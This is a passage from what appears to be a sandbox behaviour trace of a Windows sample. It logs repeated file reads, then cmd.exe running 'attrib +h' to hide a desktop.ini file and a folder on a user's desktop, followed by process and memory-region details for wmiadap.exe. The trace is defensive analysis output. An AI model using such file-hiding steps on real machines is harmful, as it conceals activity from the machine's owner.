lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.959] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0226.078] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.078] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0226.079] _close (_FileHandle=3) returned 0 [0226.079] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0226.079] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.080] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.080] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.080] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.080] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.080] GetConsoleTitleW (in: lpConsoleTitle=0x22f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.080] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f414, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f4dc | out: lpAttributeList=0x22f414, lpSize=0x22f4dc) returned 1 [0226.080] UpdateProcThreadAttribute (in: lpAttributeList=0x22f414, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f4d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f414, lpPreviousValue=0x0) returned 1 [0226.080] GetStartupInfoW (in: lpStartupInfo=0x22f3d0 | out: lpStartupInfo=0x22f3d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0226.080] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.080] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f470*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f4bc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessInformation=0x22f4bc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8e4, dwThreadId=0xd68)) returned 1 [0226.134] CloseHandle (hObject=0x50) returned 1 [0226.134] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.134] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.134] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.134] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0226.264] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22f3b0 | out: lpExitCode=0x22f3b0*=0x0) returned 1 [0226.264] CloseHandle (hObject=0x4c) returned 1 [0226.264] _vsnwprintf (in: _Buffer=0x22f4f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f3bc | out: _Buffer="00000000") returned 8 [0226.265] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.265] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.265] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.265] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.265] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.265] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.265] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f414 | out: lpAttributeList=0x22f414) [0226.265] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.265] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0226.265] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.265] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.266] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.266] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.266] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.266] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.266] GetConsoleTitleW (in: lpConsoleTitle=0x22f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f414, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f4dc | out: lpAttributeList=0x22f414, lpSize=0x22f4dc) returned 1 [0226.266] UpdateProcThreadAttribute (in: lpAttributeList=0x22f414, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f4d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f414, lpPreviousValue=0x0) returned 1 [0226.266] GetStartupInfoW (in: lpStartupInfo=0x22f3d0 | out: lpStartupInfo=0x22f3d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0226.267] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.267] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f470*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f4bc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessInformation=0x22f4bc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd88, dwThreadId=0x4d4)) returned 1 [0226.269] CloseHandle (hObject=0x4c) returned 1 [0226.269] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.269] GetEnvironmentStringsW () returned 0x2f3668* [0226.269] FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.269] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0226.314] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f3b0 | out: lpExitCode=0x22f3b0*=0x0) returned 1 [0226.314] CloseHandle (hObject=0x50) returned 1 [0226.314] _vsnwprintf (in: _Buffer=0x22f4f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f3bc | out: _Buffer="00000000") returned 8 [0226.314] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.314] GetEnvironmentStringsW () returned 0x2f3668* [0226.314] FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.314] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.314] GetEnvironmentStringsW () returned 0x2f3668* [0226.314] FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.315] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f414 | out: lpAttributeList=0x22f414) [0226.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.315] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0226.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0226.315] _get_osfhandle (_FileHandle=0) returned 0x3 [0226.315] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0226.315] SetConsoleInputExeNameW () returned 0x1 [0226.315] GetConsoleOutputCP () returned 0x1b5 [0226.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0226.315] SetThreadUILanguage (LangId=0x0) returned 0x409 [0226.315] exit (_Code=0) Process: id = "596" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x7ea168e0" os_pid = "0xd3c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "298" os_parent_pid = "0x358" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 33707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33708 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33709 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33710 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33711 start_va = 0x830000 end_va = 0x84efff entry_point = 0x830000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 33712 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33713 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33714 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33715 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33716 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33837 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33838 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33839 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33840 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 33841 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 33842 start_va = 0x71e10000 end_va = 0x71e2efff entry_point = 0x71e10000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 33843 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33844 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33845 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 33846 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33847 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 33848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33849 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33850 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33851 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 